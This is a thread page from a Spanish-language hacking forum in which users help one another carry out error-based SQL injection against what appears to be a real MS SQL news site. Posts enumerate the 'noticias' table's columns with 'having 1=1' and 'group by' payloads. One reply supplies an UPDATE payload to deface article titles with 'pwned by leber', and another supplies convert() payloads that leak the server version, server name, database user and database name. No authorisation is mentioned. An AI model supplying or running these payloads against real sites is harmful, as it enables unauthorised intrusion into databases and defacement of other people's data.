elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Duda con SQL injection
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] Ir Abajo Respuesta Imprimir
Autor Tema: Duda con SQL injection  (Leído 12,423 veces)
satan69


Desconectado Desconectado

Mensajes: 341



Ver Perfil
Re: Duda con SQL injection
« Respuesta #10 en: 22 Abril 2008, 03:57 am »

Heme aqui de nuevo ( ¿que desgracia eh  :( ?)

Bueno, vamos a ver:

Consegui sacar el nombre de una columna de una web(trabala con MS SQL), y bueno, probe algo mas, pero me quede encallado. Primero hice:

id=456+having+1=1

Y me produjo el siguiente error:

Código:
[La columna 'noticias.ANTETITULO' de la lista de selección no es válida, porque no está contenida en una función de agregado y no hay cláusula GROUP BY./code]

Asi que luego hice:

id=456+group+by+noticias.ANTETITULO+having+1=1

Y me salio:

[code]Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]La columna 'noticias.TITULO' de la lista de selección no es válida, porque no está contenida en una función de agregado ni en la cláusula GROUP BY.

/web/sp/index.asp, line 11

Asi que fui rellenando con group by, hasta que al tratar de meter la sentencia:

Código:
id=456+group+by+noticias.ANTETITULO+,noticias.TITULO+,noticias.ENTRADILLA+,noticias.FECHA+,noticias.HEAD,+noticias.TEXTO+having+1=1--

Me produjo el siguiente error:

Código:
[Microsoft][ODBC SQL Server Driver][SQL Server]No se puede comparar ni ordenar los tipos de datos text, ntext e image, excepto cuando se utiliza el operador IS NULL o LIKE.

Y ahi me quede, intente sacar la version con

Código:
id=456+union+select+@@version,1,1,1,1

Y me dijo:

Código:
[Microsoft][ODBC SQL Server Driver][SQL Server]Error de sintaxis al convertir el valor varchar 'Cinco organizaciones ecologistas denuncian la especulación urbanística como la principal amenaza del medio ambiente en España' para una columna de tipo de datos int.

Y nada mas, me quede ahi estancado, a ver si alguien puede echarme una mano, solo orientarme un poco(no me gusta que me hagan las cosas), para donde puedo ir o cuales pueden ser mis movimientos siguientes.

Gracias de antemano, y un saludo

[/code]


es asi la onda:

Código:
id=1' having 1=1--

ayi tira el error... y la mayor veces te muestra los campos y el nombre de la tabla
En línea

Leber


Desconectado Desconectado

Mensajes: 338


"Fracta, non verba"


Ver Perfil WWW
Re: Duda con SQL injection
« Respuesta #11 en: 22 Abril 2008, 09:48 am »

En algunas paginas no funciona con ', y  por eso tuve que meterlo sin la comilla.
En línea

"Solo los tontos carecen de preucupaciones." Johann Wolfgang Goethe
sch3m4
Ex-Staff
*
Desconectado Desconectado

Mensajes: 1.608

Nihil est in intelectu quod prius not fuerit insen


Ver Perfil WWW
Re: Duda con SQL injection
« Respuesta #12 en: 22 Abril 2008, 12:20 pm »

(...) te darás cuenta de porqué te salta ese error cuando metes la comilla (las comillas se usan para las cadenas) (...)

Depende de si la página interpreta ese dígito como un número, o como carácter.
En línea

SafetyBits

"Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.(..
Leber


Desconectado Desconectado

Mensajes: 338


"Fracta, non verba"


Ver Perfil WWW
Re: Duda con SQL injection
« Respuesta #13 en: 22 Abril 2008, 12:52 pm »

Si, eso ya lo lei y me entere, pero cuando me salta este error por ejemplo:

Código:
[Microsoft][ODBC SQL Server Driver][SQL Server]No se puede comparar ni ordenar los tipos de datos text, ntext e image, excepto cuando se utiliza el operador IS NULL o LIKE.

Haciendo el groupby con todas las columnas que me dijo, que deberia hacer? tratar de convertirle a numero, o usarlo con comillas supongo, no?

Saludos
En línea

"Solo los tontos carecen de preucupaciones." Johann Wolfgang Goethe
pedrox@

Desconectado Desconectado

Mensajes: 48


Ver Perfil
Re: Duda con SQL injection
« Respuesta #14 en: 27 Abril 2008, 15:44 pm »

aver.......
El simbolo + no te hace falta que lo pongas antes de la coma, podria quedar asi:

Código:
id=456+group+by+noticias.ANTETITULO,noticias.TITULO,noticias.ENTRADILLA,noticias.FECHA,noticias.HEAD,noticias.TEXTO+having+1=1--

Si te sigue tirando error, puede ser porque ya no existan mas columnas.
Si quieres updatear una, puedes hacer:

Código:
id=456+update+noticias+set+TITULO+=+'pwned by leber'--

Si quieres obtener la versión del servidor MS SQL, con que hagas esto ya te vale:

id=1+and+1=convert(int,@@version)--

Nombre del servidor:

id=1+and+1=convert(int,@@servername)--

Nombre del usuario de la DB:

id=1+and+1=convert(int,system_user)

Nombre de la DB de la página web:

id=1+and+1=convert(int,db_name())

Espero que te sirva.

Saludos.  ;)
En línea

Páginas: 1 [2] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
(DUDA) Haciendo SQL Injection. « 1 2 »
Nivel Web
flowskull 16 9,854 Último mensaje 1 Abril 2012, 23:57 pm
por afdlkglfgfdgfhgf
Duda con Sql Injection en Sql Map
Nivel Web
Blackhawk222 3 3,197 Último mensaje 14 Febrero 2012, 11:24 am
por cibergolen
Duda sobre sql injection
Nivel Web
Mapcimus 2 3,277 Último mensaje 20 Julio 2013, 02:42 am
por Mapcimus
Xss injection & sql injection pequeña duda.
Nivel Web
6666 6 3,835 Último mensaje 12 Septiembre 2014, 07:27 am
por 6666
Duda sobre SQL injection
Seguridad
JoseGutrz 5 3,187 Último mensaje 15 Abril 2017, 06:51 am
por engel lex
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines